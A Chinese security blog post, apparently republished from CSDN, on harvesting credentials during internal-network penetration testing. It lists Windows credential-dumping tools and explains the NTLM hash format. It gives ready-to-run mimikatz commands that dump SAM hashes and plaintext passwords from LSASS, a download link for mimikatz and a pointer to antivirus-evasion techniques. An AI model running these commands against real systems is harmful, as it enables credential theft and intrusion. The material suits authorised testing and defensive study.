内网渗透之内网信息收集(五)

本文阅读 1 分钟
首页 安全分享,WEB安全 正文

目录

凭证信息收集

01凭证获取工具

02密码hash

03mimikatz

04get-hashs

内网渗透之内网信息收集(六)_不知名白帽的博客-CSDN博客

01凭证获取工具

常用来获取windows密码的工具

<li style="text-align:justify;">mimikatz
<li style="text-align:justify;">wce
<li style="text-align:justify;">pwddump7
<li style="text-align:justify;">ophcrack
<li style="text-align:justify;">procdump+mimikatz
<li style="text-align:justify;">lazagne

02密码hash

LM哈希&NTLM型哈希

winodws hash:

windows本地hash:

http://www.secpulse.com/archives/65256.html

windows系统下hash密码格式:

用户名称:RID:LM-HASH值:NT-HASH值

img

03mimikatz

mimikatz下载:

链接:https://pan.baidu.com/s/1ZbQM5YrgNyqmHFWBySSJjg

提取码:jryu

非本地交互式凭证获取

mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"

mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"

一般都是通过远程登陆靶机,在靶机内下载mimikatz

log result.txt(将结果传到txt中)

img

privilege::debug(提权)

img

token::elevate(模拟令牌:用于将权限提升为SYSTEM (默认)或在框中找到域管理员令牌)

img

获取到system用户的token

lsadump::sam(获得用户哈希)

img

sekurlsa::logonpasswords(获取明文密码)

img

mimikatz1.x版本:

privilege::debug //提升权限

inject::process lsass.exe sekurlsa.dll //注入sekurlsa.dll到lsass.exe进程里

@getLogonPasswords //获取密码

mimikatz免杀:

https://www.freebuf.com/articles/system/234365.html

04get-hashs

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125627076
-- 展开阅读全文 --
安全面试之XSS(跨站脚本攻击)
« 上一篇 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复